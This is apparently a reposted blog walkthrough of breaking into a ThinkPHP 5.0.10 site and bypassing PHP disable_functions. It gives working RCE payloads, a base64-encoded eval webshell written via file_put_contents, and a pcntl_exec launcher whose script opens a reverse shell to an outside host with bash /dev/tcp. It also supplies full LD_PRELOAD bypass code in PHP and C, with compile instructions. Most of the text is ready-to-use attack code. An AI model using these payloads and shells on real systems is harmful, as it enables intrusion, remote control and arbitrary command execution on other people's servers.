Example Analysis of Thinkphp Bypass disabled function

2025-01-29 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

This article walks through a ThinkPHP target where the PHP disable_functions restriction had to be bypassed to get command execution. The steps are kept simple so they are easy to follow and reproduce.

Preface

During a penetration test, a long manual search turned up nothing, so I tried running xray just to see.

xray is indeed powerful: as soon as the web page loaded, it flagged a ThinkPHP 5.0.10 RCE vulnerability.

Using the payload directly to execute a command shows that the system function is disabled:

    s=whoami&_method=__construct&method=&filter[]=system

Trying other functions shows that call_user_func is not disabled.

Payload:

    s=phpinfo&_method=__construct&method=get&filter[]=call_user_func

The phpinfo() output lists the disable_functions directive, so you can see exactly which functions are blocked.

assert and include were not disabled, so my first idea was to write a shell into the log file and then pull it in via file inclusion. That got no response and no error.

file_put_contents

Going back to the disable_functions list, the file functions are not disabled either, so file_put_contents can be used to write a file.

Test by writing a phpinfo.php file. The filter is assert, which evaluates the value of s as PHP code; the base64 string decodes to <?php $pass=$_POST['aaaa'];eval($pass);?>, a one-line eval shell that takes its code from the aaaa POST parameter:

    s=file_put_contents('/www/wwwroot/public/phpinfo.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWydhYWFhJ107ZXZhbCgkcGFzcyk7Pz4'))&_method=__construct&filter=assert

The write succeeds.

Next, write a Behinder (冰蝎, "ice scorpion") webshell for file management.

File operations now work, but commands still cannot be executed.

pcntl_exec

Then I remembered pcntl_exec, a command-execution function that is easily overlooked when disable_functions lists are written. It turned out not to be disabled. pcntl_exec(path, args, env) replaces the current process image with the given program, so it can be pointed at an interpreter and told which file that interpreter should run.

First write an exe.php file that calls pcntl_exec with the program to run (bash) and the script file that program should execute (exec.sh).

In exec.sh, write the reverse-shell command:

    bash -i >& /dev/tcp/vpsip/7777 0>&1

Visiting exe.php in the browser brings back the shell.
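The exe.php below is an added example of the two-file setup just described; it is not the author's original file. It assumes bash lives at /bin/bash and that exec.sh (containing the reverse-shell line above) sits in the same directory as exe.php. It also adds the checks a tester wants before pulling the trigger: that pcntl_exec exists and is not disabled, and that the interpreter and script are reachable. Note that pcntl_exec replaces the current PHP worker process and never returns on success, so the optional pcntl_fork keeps the web request from hanging when that function is available.

```php
<?php
// Added example: exe.php for the pcntl_exec step.
// Not the original author's file. Paths are assumptions based on the
// web root used elsewhere in the write-up.

$interpreter = '/bin/bash';              // program to exec (assumed path)
$script      = __DIR__ . '/exec.sh';     // reverse-shell script written next to this file

// pcntl_exec() only exists when the pcntl extension is loaded, and it may
// itself be listed in disable_functions. Check both before doing anything.
if (!function_exists('pcntl_exec')) {
    die("pcntl_exec() unavailable (extension missing or disabled)\n");
}
if (!is_executable($interpreter) || !is_readable($script)) {
    die("interpreter or script not accessible\n");
}

// If pcntl_fork() is also available, run the exec in a child so the HTTP
// request returns normally and the shell is not tied to the worker's
// request lifetime. Otherwise the worker process itself becomes bash.
$pid = function_exists('pcntl_fork') ? pcntl_fork() : 0;
if ($pid > 0) {
    echo "spawned pid $pid\n";
    exit(0);
}

// Minimal environment for the new process image. On success this call
// never returns: the current process is replaced by bash running exec.sh.
$env = array('PATH' => '/usr/local/bin:/usr/bin:/bin');
pcntl_exec($interpreter, array($script), $env);

// Only reached if the exec failed (wrong path, noexec mount, etc.).
echo "pcntl_exec failed\n";
```

Because bash is started with -i but without a pty, expect "no job control" warnings on the listener; the shell still works.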

LD_PRELOAD hijacking

That ended this engagement, but one more bypass was tried along the way. If pcntl_exec is also disabled, the LD_PRELOAD environment variable can be used to hijack a libc function: any external program PHP launches loads the malicious .so first, and the code in that .so runs the system command. This needs two things from PHP that are often left enabled: putenv() to set the variable, and some function that spawns a new process (mail(), for example, which hands off to sendmail). The principle is not covered in detail here; see this article: https://www.meetsec.cn/index.php/archives/44/.

The method needs two files uploaded to the server: a .php script and a shared object (.so) compiled from a .c source.

bypass_disablefunc.php

bypass_disablefunc.php takes three parameters:

cmd: the system command to execute (e.g. whoami).

outpath: the file path where the command's output is saved (e.g. /www/wwwroot/public) so it can be displayed on the page. Check that the web user can read and write there, whether the web server is allowed to reach across directories, and that the file is overwritten on each run and deleted afterwards.

sopath: the absolute path of the shared object that hijacks the libc function (e.g. /www/wwwroot/bypass_disablefunc_x64.so). Again check whether the web server can reach across directories; placing it in the web root is safest.
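As an added example, not the script from the GitHub project referenced below, here is a bypass_disablefunc.php implementing the three parameters described above. It assumes the shared object is the one built from bypass_disablefunc.c (a constructor that runs getenv("EVIL_CMDLINE") through system()), that putenv() is not disabled, and it uses mail() as the process-spawning trigger: mail() hands the message to sendmail_path through a shell, and that child process honours LD_PRELOAD. The .so path must be absolute, and the web user must be able to write the output file.

```php
<?php
// Added example of the LD_PRELOAD bypass script described above.
// Illustration code, not the referenced project's script. Assumes the .so
// built from bypass_disablefunc.c and that putenv() and mail() are allowed.

function run_via_ld_preload(string $cmd, string $outPath, string $soPath): string
{
    // Both pieces of the trick have to be available in this PHP build.
    if (!function_exists('putenv') || !function_exists('mail')) {
        return "putenv() or mail() is disabled; the LD_PRELOAD trick needs both\n";
    }
    if (!is_readable($soPath)) {
        return "shared object not readable: $soPath\n";
    }
    // Output directory must be writable by the web user or nothing comes back.
    $dir = dirname($outPath);
    if (!is_dir($dir) || !is_writable($dir)) {
        return "output directory not writable: $dir\n";
    }

    // The .so constructor reads EVIL_CMDLINE; redirect stderr too so a
    // failing command is visible in the output file instead of vanishing.
    $cmdline = $cmd . ' > ' . escapeshellarg($outPath) . ' 2>&1';
    putenv('EVIL_CMDLINE=' . $cmdline);

    // From here on, every child process the worker starts is mapped with
    // this object first, and its constructor runs before the child's main().
    putenv('LD_PRELOAD=' . $soPath);

    // mail() forks sendmail_path via a shell; that shell is the child that
    // loads the .so. Errors from mail() itself are irrelevant here.
    @mail('', '', '', '');

    // Remove the hook so later children of this worker are not affected.
    putenv('LD_PRELOAD');
    putenv('EVIL_CMDLINE');

    if (!is_file($outPath)) {
        return "no output file produced; check sendmail_path and that the loader honours LD_PRELOAD (ignored for setuid binaries)\n";
    }
    $out = file_get_contents($outPath);
    unlink($outPath);   // do not leave command output lying in the web root
    return $out;
}

$cmd     = $_GET['cmd']     ?? 'id';
$outPath = $_GET['outpath'] ?? '/tmp/out.txt';
$soPath  = $_GET['sopath']  ?? __DIR__ . '/bypass_disablefunc_x64.so';

header('Content-Type: text/plain');
echo "cmdline: $cmd\n\n";
echo run_via_ld_preload($cmd, $outPath, $soPath);
```

Call it as bypass_disablefunc.php?cmd=id&outpath=/tmp/out.txt&sopath=/www/wwwroot/public/bypass_disablefunc_x64.so. If mail() is on the blacklist, error_log() with message type 1 also spawns sendmail and can be substituted as the trigger.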

Bypass_disablefunc.c

    #define _GNU_SOURCE
    #include <stdlib.h>   /* getenv, system */
    #include <stdio.h>
    #include <string.h>   /* strstr */

    extern char **environ;

    /* Runs when the loader maps this .so into the new process, before that
       program's main(), which is why setting LD_PRELOAD is enough. */
    __attribute__((__constructor__)) void preload(void)
    {
        /* get command line options and args, handed over via putenv() in PHP */
        const char *cmdline = getenv("EVIL_CMDLINE");
        if (cmdline == NULL)
            return;

        /* unset environment variable LD_PRELOAD so the children started by
           system() below do not load this .so again and recurse.
           unsetenv("LD_PRELOAD") has no effect on some distributions
           (e.g. CentOS), hence the trick of blanking the entry in environ. */
        int i;
        for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                environ[i][0] = '\0';
            }
        }

        /* execute the command */
        system(cmdline);
    }

Compile bypass_disablefunc.c into the shared object bypass_disablefunc_x64.so with:

    gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so

Build for the target's architecture: on an x64 host gcc produces an x64 object by default, and the -m32 option is needed to build for x86 (which requires the 32-bit multilib headers and libraries to be installed on the build machine).

The files above are available on GitHub:

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

Use the Behinder shell from the earlier file-management step to upload the .php and .so files to the server's web directory.

Then call bypass_disablefunc.php from the browser with the parameters filled in:

    http://www.xxx.com/bypass_disablefunc.php?cmd=ls&outpath=/www/wwwroot/public/1.txt&sopath=/www/wwwroot/public/bypass_disablefunc_x64.so

The command executes successfully.

That concludes this example analysis of bypassing disabled functions on a ThinkPHP target.
